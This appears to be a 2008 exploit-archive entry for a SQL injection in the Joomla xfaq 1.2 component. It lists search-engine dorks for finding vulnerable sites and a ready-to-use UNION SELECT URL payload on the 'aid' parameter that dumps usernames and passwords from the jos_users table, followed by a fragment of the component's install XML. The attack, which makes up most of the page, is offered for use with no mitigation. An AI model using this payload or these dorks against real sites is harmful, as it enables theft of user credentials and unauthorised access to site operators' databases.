Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability
# Published : 2008-02-13
# Author : S@BUN
# Previous Title : Affiliate Market Ver.0.1 BETA (language) Local File Inclusion Vulnerability
# Next Title : JSPWiki 2.4.104 / 2.5.139 Multiple Remote Vulnerabilities

###############################################################
#
#  joomla SQL Injection(com_xfaq)
#
###############################################################
#
# AUTHOR : S@BUN
#
# HOME : http://www.hackturkiye.com
# http://www.milw0rm.com/author/1334
#
# MA?°L : hackturkiye.hackturkiye@gmail.com
# www.milw0rm.com@gmail.com
#
################################################################
#
# DORK 1 : allinurl: aid "com_xfaq"
#
# DORK 2 : allinurl: "com_xfaq"
#
################################################################
EXPLOIT :

index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a,username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

################################################################
# S@BUN              i AM NOT HACKER                  S@BUN
################################################################

<mosinstall type="component" version="4.5.2">
  <name>xfaq</name>
  <creationDate>2005.11.03</creationDate>
  <author>mic / mgfi</author>
  <copyright>mgfi.info</copyright>
  <license>Released under the GNU/GPL License</license>

  <authorEmail>info@mgfi.info</authorEmail>
  <authorUrl>www.mgfi.info</authorUrl>
  <version>1.2</version>
  <description>XfaQ is an addon for Joomla 1.x and Mambo 4.5.x. Based on SimpleFAQ 2.0.1 from www.parkviewconsultants.com</description>

# www.Syue.com [2008-02-13]